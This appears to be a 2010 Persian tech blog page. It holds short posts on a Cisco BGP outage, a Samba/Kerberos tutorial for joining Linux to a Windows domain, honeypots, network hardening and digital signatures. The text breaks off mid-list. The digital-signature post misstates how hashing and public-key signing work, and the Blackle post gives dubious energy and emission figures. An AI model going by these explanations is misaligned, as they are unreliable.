تبليغاتX
I.R InterNet

I.R InterNet

اینترنت به سبک ایرانی برای جوانان ایرانی

مشکل سیسکو 1% اینترنت را مختل کرد

هفته گذشته شرکت سیسکو یک اشکال فنی را در سیستم عامل (Internetwork Operating System) برخی از روترهای خود که باعث قطع اینترنت در برخی کشورها شد، برطرف نمود.

اشکال فنی زمانی آشکار شد که یک گروه دانشگاهی برای انجام تحقیقات خود اقدام به ارسال اطلاعات از طریق پروتکل BGP  یا همان Border Gateway Protocol بر روی اینترنت نمودند. به فاصله چند دقیقه، تعدادی از روترهای اصلی اینترنت از کار افتادند.

پروتکل BGP توسط روترها برای شناسایی بهترین مسیر ارسال اطلاعات به دیگر روترها مورد استفاده قرار می گیرد. به همین دلیل امکان انتشار سریع اطلاعات مخرب یا مخدوش از طریق پروتکل BGP همیشه وجود دارد و بسیاری از کارشناسان همواره هشدار داده اند که روزی از این پروتکل برای از کار انداختن اینترنت سوء استفاده خواهد شد.

پس از این اتفاق، بررسی ها نشان داد که روترهای سیستم عامل Cisco IOS XR اطلاعات تحقیقاتی ارسال شده را دریافت کرده ولی به دلیل حجم زیاد و غیر متعارف اطلاعات، آن را مخدوش کرده  و سپس به دیگر روترهای مجاور فرستاده اند. روترهای دریافت کننده این اطلاعات مخدوش نیز، فوراً ارتباط با روترهای ارسال کننده را مسدود ساخته و بدین ترتیب باعث از کار افتادن بخشی از اینترنت شده اند.

سیستم عامل Cisco IOS XR بر روی روترهای بزرگ که مورد استفاده شرکت های مخابراتی هستند، استفاده می شود.

اشکال فنی در روترهای سیسکو باعث شد که دسترسی به اینترنت در 60 کشور با مشکل روبرو شود. بیش از 3500 دسته از نشانی های IP اینترنت در جهان تحت تاثیر این اشکال فنی قرار گرفتند. بر روی اینترنت فقط۳۳۳۰۰۰ دسته نشانی IP وجود دارد، پس به عبارتی 1% از اینترنت دچار اختلال شده بود.

 

+ نوشته شده در  89/11/03ساعت 13:44  توسط مهیار  | 

نصب Squid 2.7 بر روی ویندوز

فواید :

-جلوگیری از اتلاف پهنا باند

- صرفه جویی در ADSL واسه کسایی که حجمی هستند .

اعمال سیاست های امنیتی در شبکه و ...

دانلود اسکوید + آموزش نصب و … در ادامه مطلب …….


ادامه مطلب
+ نوشته شده در  89/03/21ساعت 0:53  توسط مهیار  | 

تاثیر شرایط محیطی بر شبکه های wireless

با توجه به اینکه شبکه های بیسیم توسط امواج پراکنده در هوا کار میکند شبکه های وایرلس به شدت تحت تاثیر متغیر های خارجی و داخلی قرار می گیرند که از آن جمله می توان به پدیده های آب و هوایی مانند :باد، باران ، برف ، مه ، دما و فشار که همگی ناشی از موقعیت جغرافیایی منطقه مورد نظر می باشد اشاره کرد .

لازم به ذکر است که امواج حاصل در شبکه های وایرلس از نوع الکترومغناطیس (EM) می باشند .


ادامه مطلب
+ نوشته شده در  89/03/21ساعت 0:43  توسط مهیار  | 

خسارت ۱۲۰ میلیون دلاری بازی Pac-Man گوگل به اقتصاد جهانی !

 

اگه یادتون باشه چند روز پیش گوگل در اقدامی جالب لوگوی خود را به مناسبت ۳۰ سالگی تولد Pacman به این بازی قدیمی تغییر داد . این لوگو به مدت ۴۸ ساعت در صفحه اصلی گوگل قرار داشت و بازدیدکنندگان این موتور جست و جو می توانستند Pacman را در لوگوی گوگل بازی کنند . اما دیلی تلگراف از جنبه دیگری به این تغییر لوگو نگاه کرده و با کمک شرکت Rescue Time که یکی از شرکای گوگل نیز است آمار جالبی را در این زمینه ارائه کرده است. این سایت بدین نتیجه رسیده که کاربران و بازدیدکنندگان گوگل با گذراندن نزدیک به حدود ۵۴۰ سال در صفحه اول این سایت و انجام بازی PacMan خسارتی در حدود ۱۲۰ میلیون دلار به اقتصاد جهانی زده اند !

اما این آمار چگونه گرفته شده است ؟ روزانه حدودا ۵۴۰ میلیون نفر از صفحه اول گوگل بازدید می کنند که طبق برآیند و تخمین انجام شده در دو روزی که گوگل لوگوی خود را عوض کرده , بازدیدکنندگان این سایت ۴ میلیون و ۸۰۰ هزار ساعت که دقیقا معادل ۵۴۰ سال است در صفحه اول این سایت گذرانده اند.Rescue Time با در نظرگرفتن میانگین درآمد ۲۵ دلار به این نتیجه رسیده که ۱۲۰ میلیون دلار یا رقم دقیق آن ۱۲۰،۴۸۳،۸۰۰ به اقتصاد جهانی ضربه خورده است ؛ گوگل اعلام کرده که این مبلغ به میزان درآمد کلیه کارکنان آن به مدت ۶ ماه بوده است . این ها نشان از تاثیر عظیم گوگل بر دنیا و اقتصاد جهانی دارد . یادم هست که چند وقت پیش هم خبری منتشر شد و در وبلاگم نوشتمکه اگر گوگل به جای رنگ سفید از رنگ سیاه در صفحه اول خود استفاده می کرد به میزان زیادی از مصرف هزینه برق در دنیا و به تبع آن آلودگی هوا کاسته می شد !

ضمنا گوگل به دلیل استقبال زیاد از بازی Pac-Man یک صفحه اختصاصی برای این بازی قرار داده که علاقه مندان به آن می توانند از اینجا آن را بازی کنند .

+ نوشته شده در  89/03/14ساعت 3:9  توسط مهیار  | 

با استفاده از گوگل تیره ۷۵۰ مگاوات در مصرف برق صرفه جویی کنید !

آیا میدانید رنگ صفحه گوگل تا چه میزان روی مصرف برق در دنیا تاثیرگذار است؟. طبق تحقیق صورت گرفته مصرف برق برای سایت سیاه (تیره) گوگل به مراتب کمتر از نسخه عادی (روشن) است . طبق تحقیقات انجام شده نمایشگرهای CRT برای نمایش یک صفحه سفید گوگل ۷۴ وات و برای نمایش یک صفحه تیره آن ۵۹ وات برق مصرف می کنند که 15 وات اختلاف آن ها است. به همین منظور و برای کاهش مصرف برق سایت تیره گوگل طراحی گردیده که تمامی ویژگی های مانند گوگل اما با رنگی تیره است . blackle یکی از این سایت ها است که گوگل را به صورت تیره عرضه می کند و در صفحه اول آن نیز میزان برق صرفه جویی شده با بازدید از blackle هم نوشته است. طبق تحقیقات انجام شده این سایت تیره گوگل می تواند سالانه ۷۵۰ مگاوات برق صرفه جویی کند و مانع انتشار ۴۵۷ هزارو ۵۰۰ کیلوگرم منواکسید کربن در اتمسفر زمین شود. این میزان منواکسید کربن که دوباره جذب ۵۹۰ هزارو ۳۲۳ متر مربع جنگل می شود، برابر با هزارو ۳۴۹ بشکه نفت است !

پس بیایید با استفاده از  blackle یا موتورهای مشابه تیره گوگل به طبیعت و آیندگان خود کمک کنیم !

+ نوشته شده در  89/03/14ساعت 3:8  توسط مهیار  | 

کاربران اینترنت هوشیار باشید... !

گوگل امشب یعنی از  ساعت ۲۱:۲۵ روز ۷ خرداد مصادف با 28 may به مدت ۲۵ دقیقه یعنی تا ساعت ۲۱:۵۰ فیلتر بود.

اگر خاطراتمان را مرور کنیم ارجاعتون میدم به حدوداْ یک سال قبل ( کلیک کنید )

۸۸/۳/۴ فیس بوک فیلتر شد و ۷/۳/۸۹ گوگل با این تفاوت که فیس بوک هنوز هم فیلتر است اما گوگل موقتاْ ( تاکید میکنم " موقتاْ " ) باز است ، اما مدتهاست اطرافیان از من شنیده اند ایران دستور کاری که از چین دریافت کرده را پیاده سازی میکند ، ارتش سایبری و حمله به شبکه ها اجتماعی و حال پیش بینی نه چندان خوشایندی که کاش همیجا تمام شود سریال فیلترینگ حکایتی بلند مثل سریال جومونگ دارد که بعد از هر پایان ، ققنوس وار شروعی جدید و برمی افروزد.

یادمان نرود که این حرکت بعد از حمله رسانه ای شدید اخیر به اینترنت توسط برنام هایی چون سریال هوش سیاه و میز گرد هدهد و ... انجام شد

زنگ خطری که اگر اینطور ادامه پیدا کند سرویس های اینترنتی در ایران تعطیل می شوند.

بخشی توسط خود ایران و بخشی به عنوان تحریم از جانب جامعه بین المللی...

اگر سکوت پیشه کنیم اینترانت ملی جای اینترنت را خواهد گرفت و اینترنت هم تبدیل به رسانه شخصی میشود. به هر حال همین فیلترینگ هم خود جای بحث دارد چرا که google.com فیلتر بود اما سرویس https گوگل و بقیه آدرسها مانند google.co.uk باز بود.

 

+ نوشته شده در  89/03/08ساعت 0:28  توسط مهیار  | 

Join کلاینت لینوکس به win 2003 AD

برای اینکه لینوکس خود را عضو دامین ویندوزی کنیم از Samba  ، winbind  و Kerberos  کمک می گیریم . پس نیاز هست تا این سه بسته را تهیه و نصب کنید . البته هر سه این بسته در سی دی اغلب توزیع های لینوکس موجود است و اگر الان می خواهید لینوکس را نصب کنبد می توانید در هنگام نصب این بسته ها را نیز انتخاب کنید . برای این آموزش من از توزیع Fedora Core 5  و همچنین windows 2003  که اکتیو دایرکتوری بر روی آن در حال اجرا است استفاده کردم .  

 

Linux Box ( FC 5 ) --------------- 192.168.0.20 ---------------- cahe.linux.com

Windows BOX (2003)------------ -192.168.0.254 ------------omid.linux-notes.ir

 

پس نام دامین ویندوزی linux-notes.ir  است . و در فایل هایی که در ادامه پیکربندی می کنیم هرجا مقدار REALM  خواسته شد باید از همین نام استفاده کرد و

 

 ۱- تنظیمات Name Resolution:

در هنگام نصب اکتیو دایرکتوری در ویندوز سرویس DNS  نیز راه اندازی می شود . برای اجرای فرامینی که در ادامه خواهد آمد باید عمل Name Resolution در کلاینت لینوکس انجام گیرد . می توانید به راحتی dns  لینوکس را سرور ویندوز قرار دهید . یا نام و آی پی ویندوز را در فایل /etc/hosts  قرار دهید.

#/etc/hosts

127.0.0.1   localhost localhost.localdomain

192.168.0.254 omid.linux-notes.ir omid

192.168.0.20  cache.linux.com cache

 

 

۲ –اگر سرویس های Samba  و winbind  در لینوکس شما در حال اجرا است آنها را متوقف کنید .

Service smb stop

Service winbind stop

 

۳- تنظیمات Samba

Samba  را می توان پلی بین سیستم عامل ها تعریف کرد . سیستم عامل ها از جمله ویندوز و لینوکس .

به عنوان مثال برای دسترسی به فولدر های به اشتراک گذاشته شده در ویندوز از طریق لینوکس یا بالعکس. اینجا نمی خواهم در مورد samba  و کانفیگ های مختلف ان توضیح بدهم و  پیکربندی که برای join  کردن لینوکس به وینوز نیاز داریم در اختیار شما قرار می دهم . برای بررسی مفاهیم تگ ها می توانید به وبسایت Samba  رجوع کنید .  .

فایل پیکربندی samba  در مسیر /etc/samba  به نام smb.conf  موجود است . برای پیکربندی Samba  در این حالت فقط کافی است تگ های زیر تغییر دهید .

realm = LINUX-NOTES.IR

security = ADS

encrypt passwords = yes

password server = omid.linux-notes.ir

winbind separator = +

 winbind enum users = yes

 winbind enum groups = yes

winbind uid = 10000-20000

winbind gid = 10000-20000

workgroup = LINUX-NOTES0

 

توجه داشته باشید که برای پارامتر REALM  باید نام دامنه را با حروف بزرگ بنویسید .

اگر چه تغییر تگ workgroup  ضروری نیست ولی برای جلوگیری از اخطار Samba  هنگام join  کردن لینوکس به ویندوز بهتر است آنرا با نام NetBios  ویندوز مقدار دهی کنید . برای بدست آوردن نام NetBios  میتوانید از دستور nbtstat –n  بهره بگیرید .

 برای چک کردن تنظیمات فایل smb.conf از لحاظ املا و دستوری می توانید از دستور testparm  بهره بگیرید .

 ۴ – تنظیمات Kerberos  

برای پیکربندی Kerberos  فایل krb5.conf  که در پوشه /etc  است را به صورت زیر ویرایش کنید .

[logging]

default = FILE:/var/log/krb5lib.log

 [libdefaults]

ticket_lifetime = 24000

clock_skew = 300

default_realm = LINUX-NOTES.IR

[realms]

LINUX-NOTES.IR = {

kdc = omid.linux-notes.ir

admin_server = omid.linux-notes.ir

default_domain = linux-notes.ir

}

 

[domain_realm]

.linux-notes.ir = LINUX-NOTES.IR

linux-notes.ir = LINUX-NOTES.IR 

۵ – اجرای دستور net

net ads join –S MACHINE_NAME –U username%password

MACHINE_NAME: نام کامل ماشین ویندوز که در اینجا omid.linux-notes.ir  است

username : نام کاربری با اختیارات در سطح ادمین دامین مثلا Administrator

Password : پسوورد کاربر با اختیارات domain administrator  در ویندوز

 خوب لینوکس شما به دامین join  شد . برای تست این موضوع می توانید از دستورnet jointest استفاده کنید .

و نام کامپیوتر در لیست کامپیوتر های عضو شده در دامین قرار می گیرد.

 

+ نوشته شده در  89/01/30ساعت 14:2  توسط مهیار  | 

Blue-Ray چیست

بلو - رِي فن‌آوري آينده ديسک‌هاي نوري است که توسط انجمن ديسک بلو - رِي طراحي و ساخته شده است.
اين انجمن توسط گروهي از بزرگترين سازندگان دستگاه‌هاي سينماي خانگي و کامپيوتر از جمله سوني، پاناسونيک، اپل،شارپ و سامسونگ پشتيباني مي‌شود.
ديسک‌هاي بلو - رِي براي ضبط و پخش تصاوير با وضوح بالا (HD) طراحي شده‌اند و داراي ظرفيتي 5 برابر ديسک‌هاي ساده DVD هستند.
ديسک‌هاي تک لايه بلو - رِي 25 گيگابايت ظرفيت دارند در حالي که ديسک‌هاي دو لايه بلو - رِي تا 50 گيگابايت اطلاعات را در خود ذخيره مي کنند.
با بهره‌گيري از اين ظرفيت بالا و ظرافت‌هاي تنظيم صدا و تصوير با کيفيت‌هاي بالا، ديسک‌هاي بلو - رِي مناسب‌ترين ابزار آينده صنعت سينماي خانگي خواهند بود.
ديسک‌ خوان‌هاي DVD از ليزر قرمز استفاده مي کنند در حالي که ديسک‌هاي بلو - رِي از نور آبي بهره‌ مي‌گيرند. طول موج نور قرمزي که در ديسک‌خوان‌هاي DVD به کار مي‌رود، 650 نانومتر است در حالي که ليزر آبي 405 نانومتر طول موج دارد که به دستگاه‌هاي ضبط بلو‌ - رِي توانايي ثبت اطلاعات در مقياسي کوچکتر را مي‌دهد. [چطور DVD کار مي‌کند؟]
اين امر باعث مي‌شود تا ثبت اطلاعات متمرکزتر و دقيق‌تر شود و از شيار‌هاي ديسک بيشترين استفاده را کرد. جالب است که بدانيد فن‌آوري جديد چندلايه ساختن ديسک‌ها، ظرفيت بلو - رِي را تا 500گيگا بايت افزايش داده است.
به دليل پشتيباني وسيع توليد کنندگان تجهيزات سينماي خانگي از اين فن‌آوري، تعداد زيادي از استوديو‌هاي هاليوود شروع به توزيع فيلم‌هاي خود بر روي اين ديسک‌ها کرده‌اند
+ نوشته شده در  89/01/04ساعت 21:57  توسط مهیار  | 

امضای دیجیتالی

يكي از هداياي ناخواسته فناوري اطلاعات و ارتباطات به جوامع كاربران را مي توان جعل كردن هاي پيوسته در شبكه دانست. زماني كه شما براي دوستتان هيچ ايميلي نفرستاده ايد، اما او با شما تماس مي گيرد و مي گويد كه منظورتان از اين ايميل چه بوده است و يا زماني كه رئيستان شما را براي ايميلي كه برايش فرستاده ايد، مورد بازخواست قرار مي دهد، تنها گوشه اي از دنياي جعل فناوري اطلاعات را ديده ايد. امنيت يكي از مهم ترين و بحث انگيزترين مسائل درحوزه فناوري اطلاعات و ارتباطات است كه در سال هاي اخير با توجه به رشد روزافزون استفاده از شبكه جهاني وب (World Wide Web) گريبانگير كاربران شده است و در بعضي از مواقع نيز سبب از كار افتادن پايگاه هاي اطلاعاتي و وب سايت ها شده است. جعل كردن را بايد مقوله اي جدا از هك كردن دانست، زيرا در جعل كردن دزدان ديجيتالي خود را به جاي شخصي كه وجود دارد، جا مي زنند و اقدام به سرقت اطلاعات مي كنند، اما در هك كردن، نفوذها عمدتا در نقش شخص ثالثي صورت مي گيرد كه لزوما وجود فيزيكي ندارد، اما نتيجه هر دو نفوذ، از دست دادن اطلاعات و كاهش امنيت است. براي جلوگيري از نفوذ دزدان به سيستم ها و پيشگيري از جعل مدارك و امضاها از سيستم هاي سنتي راهكارهايي پيش بيني شده است، راهكارهايي مانند گواهي امضا از سوي مقام فوق، استفاده از دستگاه هاي تشخيص با حساسيت بالا و غيره، اما در دنياي مجازي نيز براي اين قضيه راه حل هايي انديشيده شده است كه امضاي ديجيتال يكي از اين راه حل هاست.

امضاي ديجيتال
امضاي ديجيتال مبتني بر الگوريتم هاي رمزنگاري و الگوريتم هاي Hashing است. به عنوان نمونه اي از الگوريتم هاي رمزنگار مي توان به RSA و EL Gamal و الگوريتم هاي Hashing، MD5 و SHA اشاره كرد. روال كار در امضاي ديجيتال به اين شكل است كه پيش از ارسال داده ها، آنها را با استفاده از الگوريتم هاي Hashing به يك كد فشرده Hash تبديل مي كنند كه اين كد در حقيقت حاوي اطلاعات شما مي باشد. مقادير هك شده همگي طول يكساني دارند و در صورت تغيير در اطلاعات ورودي Hash Code جديدي توليد مي شود. اين الگوريتم ها همگي يك طرفه هستند، يعني پس از كد شدن اطلاعات نمي توان از روي اين كدها اطلاعات اصلي را به دست آورد و تنها در صورتي مي توان آن را كدگشايي كرد كه كليد اين كدها را در اختيار داشت.

امنيت كدها
دغدغه ديگر كدهاي Hash شده اين است كه امنيت اين كدها چگونه تأمين خواهد شد . در جواب اين سوال بايد گفت كه امنيت كدهاي Hash شده با دو كليد عمومي و خصوصي تضمين مي شود. كليد عمومي در اختيار همگان قرار دارد و همگي امكان دسترسي به آن را دارند اما بر خلاف كليد عمومي، كليد خصوصي تنها به دارنده Hashcodeتعلق دارد. در عمل نيز اگر اطلاعاتي را با كليد خصوصي(private key) به حالت قفل درآوريد با همه كليد هاي عمومي (publickey) باز مي شود، اما نمي توان با استفاده از هيچ كليد عمومي اطلاعات را مانند كليدهاي خصوصي به حالت كد شده تبديل كرد. در جريان ارسال اطلاعات كد Hash به دست آمده از الگوريتم محاسباتي توسط كليد خصوصي به حالت رمز تبديل مي شود و همراه با كليد عمومي به انتهاي داده ها اضافه شده و براي گيرنده ارسال مي شود به علاوه كد Hash واقعي داده ها نيز محاسبه شده و در انتها اين دو كد باهم مقايسه مي شوند. اگر اين دو كد همخواني داشتند بيانگر اين است كه داده هاي ارسال شده دستكاري نشده اند و قابليت اعتماد دارند اما در صورتي كه Hash كدهاي ارسالي و واقعي يكسان نباشند به معناي دستكاري در اطلاعات است و اين اطلاعات ديگر قابل اطمينان نيستند. حلقه كليد را مي توان مجموعه اي از كليدها دانست، يك حلقه كليد از كليد هاي عمومي همه افرادي كه براي شما اطلاعاتي در قالب Hashcode ارسال كرده اند است
+ نوشته شده در  89/01/04ساعت 21:54  توسط مهیار  | 

درک honeypot بخش 2

در بخش اول اين مقاله ، تعريفي از Honeypot ها ارائه داديم و فوايد و مضرات آنها را بيان كرديم. در اين بخش درباره انواع آنها بحث خواهيم كرد
انوع Honeypot ها
Honeypot ها در اندازه و شکلهاي مختلفي هستند و همين امر باعث شده است که فهم آنها کمي مشکل شود. براي اينکه بتوان بهتر آنها را فهميد همه انواع مختلف آنها را در دو زير مجموعه آورده ايم:
1- Honeypot هاي کم واکنش
2- Honeypot هاي پرواکنش
اين تقسيم بندي به ما کمک مي کند که چگونگي رفتار آنها را بهتر درک کنيم. و بتوانيم به راحتي نقاط ضعف و قدرت آنها و توانايي ها يشان را روشن تر کنيم. واکنش در اصل نوع ارتباطي که يک نفوذگر با Honeypot دارد را مشخص مي کند.
ادامه مطلب
+ نوشته شده در  88/12/24ساعت 1:57  توسط مهیار  | 

درک honeypot بخش 1

 
قدم اول در فهم اينكه Honeypot چه مي باشند بيان تعريفي جامع از آن است. تعريف Honeypot مي تواند سخت تر از آنچه كه به نظر مي رسد باشد. Honeypot ها از اين جهت كه هيچ مشكلي را براي ما حل نمي كنند شبيه ديواره هاي آتش و يا سيستمهاي تشخيص دخول سرزده نمي باشند. در عوض آنها يك ابزار قابل انعطافي مي باشند كه به شكلهاي مختلفي قابل استفاده هستند.آنها هر كاري را مي توانند انجام دهند از كشف حملات پنهاني در شبكه هاي IPv6 تا ضبط آخرين كارت اعتباري جعل شده! و همين انعطاف پذيريها باعث شده است كه Honeypot ها ابزارهايي قوي به نظر برسند و از جهتي نيز غير قابل تعريف و غير قابل فهم!!

ادامه مطلب
+ نوشته شده در  88/12/24ساعت 1:56  توسط مهیار  | 

جايگاه Honeypot ها

دو دسته Honeypot داريم كه براي اهداف و تحقيقات ما مورد مطالعه قرار مي گيرند. وقتي از Honeypot ها به صورت محصولات توليد شده براي محافظت از سازمان ها استفاده مي كنيم مي توانند ما را در موارد مختلفي محافظت كنند از جمله مي توان محافظت ، كشف و پاسخ مناسب به يك حمله را بيان كرد. وقتي آنها را در جهت امور تحقيقاتي به كار مي بريم Honeypot ها اطلاعات لازم را براي ما جمع آوري مي كنند. البته اين اطلاعات براي سازمانهاي مختلف فرق مي كند. عده اي شايد بخواهند دشمنان بيروني خود را شناسايي كنند ، يا كارمندان و خريداران خرابكار خود را بشناسند اين سازمانها نيز مي توانند از اين دسته Honeypot ها استفاده كنند.


ادامه مطلب
+ نوشته شده در  88/12/24ساعت 1:54  توسط مهیار  | 

كليات امنيت شبكه

وقتي بحث امنيت شبكه پيش مي ايد ، مباحث زيادي قابل طرح و ارائه هستند ، موضوعاتي كه هر كدام به تنهايي مي توانند جالب ، پرمحتوا و قابل درك باشند ، اما وقتي صحبت كار عملي به ميان مي ايد ، قضيه يك جورايي پيچيده مي شود . تركيب علم و عمل ، احتياج به تجربه دارد و نهايت هدف يك علم هم ، به كار امدن ان هست . وقتي دوره تئوري امنيت شبكه را با موفقيت پشت سر گذاشتيد و وارد محيط كار شديد ، ممكن است اين سوال برايتان مطرح شود كه '' خب ، حالا از كجا شروع كنم ؟ اول كجا را ايمن كنم ؟ چه استراتژي را پيش بگيرم و كجا كار را تمام كنم ؟ '' انبوهي از اين قبيل سوالات فكر شما را مشغول مي كند و كم كم حس مي كنيد كه تجربه كافي نداريد و اين البته حسي طبيعي هست . پس اگر اين حس رو داريد و مي خواهيد يك استراتژي علمي - كاربردي داشته باشيد ، تا انتهاي اين مقاله با من باشيد تا قدم به قدم شما رو به امنيت بيشتر نزديك كنم. هميشه در امنيت شبكه موضوع لايه هاي دفاعي ، موضوع داغي هست و نظرات مختلفي وجود دارد . عده اي فايروال را اولين لايه دفاعي مي دانند ، بعضي ها هم Access List رو اولين لايه دفاعي مي دانند ، اما واقعيت پنهان اين هست كه هيچكدام از اينها ، اولين لايه دفاعي نيستند . يادتون باشد كه اولين لايه دفاعي در امنيت شبكه و حتي امنيت فيزيكي ، Policy هست . بدون policy ، ليست كنترل ، فايروال و هر لايه ديگر ، بدون معني مي شود و اگر بدون policy شروع به ايمن كردن شبكه كنيد ، محصول يك آبكش واقعي از كار در مي ايد . با اين مقدمه ، و با توجه به اين كه شما policy مورد نظرتان را كاملا تجزيه و تحليل كرديد و دقيقا مي دانيد كه چه چيزي رو مي خواهيد و چي را احتياج نداريد ، كار را شروع مي كنيم . ما بايد پنج مرحله رو پشت سر بگذاريم تا كارمان تمام بشود . اين پنج مرحله عبارتند از : 1- Inspection ( بازرسي ) 2- Protection ( حفاظت ) 3- Detection ( رديابي ) 4- Reaction ( واكنش ) 5- Reflection ( بازتاب) در طول مسير ، از اين پنج مرحله عبور مي كنيم ، ضمن اينكه ايمن كردن شبكه به اين شكل ، احتياج به تيم امنيتي دارد و يك نفر به تنهايي نمي تواند اين پروسه رو طي كند و اگر هم بتواند ، خيلي طولاني مي شود و قانون حداقل زمان ممكن را نقض مي كند . 1- اولين جايي كه ايمن كردن رو شروع مي كنيم ، ايمن كردن كليه authentication هاي موجود هست . معمولا رايج ترين روش authentication كه مورد استفاده قرار مي گيرد ، استفاده از شناسه كاربري و كلمه رمز هست. مهمترين جاهايي كه بايد authentication را ايمن و محكم كرد عبارتند از : - كلمات عبور كاربران ، به ويژه مديران سيستم . - كلمات عبور سوييچ و روتر ها ( من روي سوييچ خيلي تاكيد ميكنم ، چون اين device به صورت plug and play كار مي كند ، اكثر مديرهاي شبكه از config كردن ان غافل مي شوند ، در حالي كه مي تواند امنيت خيلي خوبي به شبكه بدهد ، به مديران امنيتي توصيه ميكنم كه حتما اين device رو كنترل كنند ) . - كلمات عبور مربوط به SNMP . - كلمات عبور مربوط به پرينت سرور . - كلمات عبور مربوط به محافظ صفحه نمايش . آنچه كه شما در كلاسهاي امنيت شبكه در مورد Account and Password Security ياد گرفتيد را اينجا به كار مي بريد . كه من به خاطر طولاني نشدن بحث به انها اشاره نميكنم . 2- قدم دوم نصب و به روز كردن آنتي ويروس بر روي همه دسكتاپ ، سرور و ميل سرورها هست . ضمن اينكه آنتي ويروس هاي مربوط به كاربران بايد به طور اتوماتيك به روز رساني بشود و آموزشهاي لازم در مورد فايلهاي ضميمه ايميل ها و راهنمايي لازم جهت اقدام صحيح در صورت مشاهده موارد مشكوك يا اضطراري به كاربران هم داده بشود . 3 - مرحله سوم شامل نصب آخرين به روز رساني هاي امنيتي سيستم عامل و سرويسهاي موجود هست . در اين مرحله علاوه بر كارهاي ذكر شده ، كليه سرورها و device ها و دسك تاپ ها با ابزار هاي شناسايي حفره هاي امنيتي بررسي مي شوند تا علاوه بر شناسايي و رفع حفره هاي امنيتي ، سرويس هاي غير ضروري هم شناسايي و غيرفعال بشوند . 4-در اين مرحله نوبت گروه بندي كاربران و اعطاي مجوزهاي لازم به فايلها و دايركتوري ها ميباشد . ضمن اينكه account هاي قديمي هم بايد غير فعال شوند . گروه بندي و اعطاي مجوز بر اساس يكي از سه مدل استاندارد Access Control Techniques يعني MAC , DAC يا RBAC انجام مي شود . بعد از پايان اين مرحله ، يك بار ديگه امنيت سيستم عامل بايد چك بشود تا چيزي فراموش نشده باشد . 5- حالا نوبت device ها هست كه معمولا شامل روتر ، سوييچ و فايروال مي شود . بر اساس policy موجود و توپولوژي شبكه ، اين box ها بايد config بشوند . تكنولوژي هايي مثل NAT , PAT و filtering و غيره در اين مرحله مطرح مي شود و بر همين اساس اين مرحله خيلي مهم هست. حتي موضوع مهم IP Addressing كه از وظايف مديران شبكه هست مي تواند مورد توجه قرار بگيرد تا اطمينان حاصل بشود كه از حداقل ممكن براي IP Assign به شبكه ها استفاده شده است. 6- قدم بعد تعيين استراژي backup گيري هست . نكته مهم كه اينجا وجود دارد اين هست كه بايد مطمئن بشويم كه سيستم backup گيري و بازيابي به درستي كار مي كند و بهترين حالت ممكن باشد . 7- امنيت فيزيكي . اول از همه به سراغ UPS ها مي رويم . بايد چك كنيم كه UPS ها قدرت لازم رو براي تامين نيروي الكتريكي لازم جهت كار كرد صحيح سخت افزار هاي اتاق سرور در زمان اضطراري رو داشته باشند . نكات بعدي شامل كنترل درجه حرارت و ميزان رطوبت هست. همينطور ايمني در برابر سرقت و آتش سوزي. سيستم كنترل حريق بايد به شكلي باشد كه به نيروي انساني و سيستم هاي الكترونيكي آسيب وارد نكند . به طور كل آنچه كه در مورد امنيت فيزيكي ياد گرفتيد را در اين مرحله به كار مي بريد . 8- امنيت وب سرور يكي از موضوعاتي هست كه روش بايد وسواس داشته باشيد. به همين دليل در اين قسمت كار ، مجددا و با دقت بيشتر وب سرور رو چك و ايمن مي كنيم . در حقيقت ، امنيت وب رو اينجا لحاظ مي كنيم . ( اسكريپت هاي سمت سرويس دهنده رو هيج وقت فراموش نكنيد ) 9 - حالا نوبت چك ، تنظيم و تست سيستم هاي Auditing و Logging هست . اين سيستم ها هم مي تواند بر پايه host و هم بر پايه network باشد . سيستم هاي رد گيري و ثبت حملات هم در اين مرحله نصب و تنظيم مي شوند. بايد مطمئن شويد كه تمام اطلاعات لازم ثبت و به خوبي محافظت مي شود . در ضمن ساعت و تاريخ سيستم ها درست باشد ، مبادا كه اشتباه باشه كه تمام زحماتتان در اين مرحله به باد ميرود . و امكان پيگيري هاي قانوني در صورت لزوم ديگر وجود ندارد . 10- ايمن كردن Remote Access با پروتكل ها و تكنولوژي هاي ايمن و Secure قدم بعدي رو تشكيل مي دهد. در اين زمينه با توجه به شرايط و امكانات ، ايمن ترين پروتكل و تكنولوژي ها رو به خدمت بگيريد . 11 - نصب فايروال هاي شخصي در سطح host ها ، لايه امنيتي مضاعفي به شبكه شما ميدهد . پس اين مرحله رو فراموش نكنيد . 12 - شرايط بازيابي در حالت هاي اضطراري رو حتما چك و بهينه كنيد . اين حالت ها شامل خرابي قطعات كامپيوتري ، خرابكاري كاربران عادي ، خرابي ناشي از بلاياي طبيعي ( زلزله - آتش سوزي - افتادن - سرقت - سيل و ... ) و خرابكاري ناشي از نفوذ هكرها ، ميباشد . استاندارد هاي warm site و hot site را در صورت امكان رعايت كنيد. يادتون باشد كه '' هميشه در دسترس بودن اطلاعات '' ، جز، قوانين اصلي امنيتي هست . 13- و قدم آخر اين پروسه كه در حقيقت شروع يك جريان هميشگي هست ، عضو شدن در سايتها و بولتن هاي امنيتي و در جريان آخرين اخبار امنيتي قرار گرفتن هست . براي همه شما عزيزان آرزوي سلامتي و موفقيت را دارم .
+ نوشته شده در  88/10/17ساعت 1:13  توسط مهیار  | 

مراحل ساخت فایل setup در ویژوال بیسیک

درویژوال بیسیک ابزاری به نام Pakage & Development Wizard وجود دارد که برای نصب برنامه به کار می رود. برای ایجاد برنامه نصب مراحل زیر را انجام دهید:
1. گزینه
Start/ All Program/Microsoft Visual Basic 6.0/ Microsoft Visual Basic 6.0 Tools/ Package & Development
را اجرا کنید
2. با دکمه Browse ، برنامه ای را انتخاب کنید که باید برای آن برنامه Setup ایجادشود.
3. پس از انتخاب فایل پروژه دکمه Package را کلیک کنید.
4. در پنجره ظاهر شده ، دکمه Compile را کلیک نمایید تا برنامه ، کامپایل شود و پنجره انتخاب Package Type ظاهر شود .
5. در پنجره Package Type ، دکمه Standard Setup Package را انتخاب کرده ، دکمه Next را کلیک کنید تا پنجره Folder Package ظاهر شود. در این پنجره می توانید پوشه ای را انتخاب کنید که برنامه نصب باید در آن پوشه قرار گیرد یا می توانید پوشه جدیدی را ایجاد کرده و برنامه نصب را در آن پوشه قرار دهید.
6. در پنجره Package Folder ، دکمه Next را کلیک کنید تا پنجره Include Files ظاهر شود.
7. در این پنجره فایل هایی را که در پروژه قرار می گیرند ، ظاهر می شوند. چنانچه می خواهید فایل های جدیدی را به پروژه اضافه کنید، می توانید دکمه Add را کلیلک کنید تا پنجره Add File ظاهر شود.
8. در این پنجره می توانید انواع فایل های زیر را انتخاب کنید:
• فایل های exe : فایل های اجرایی
• فایلهای dll : فایل های کتابخانه ای پیوند پویا
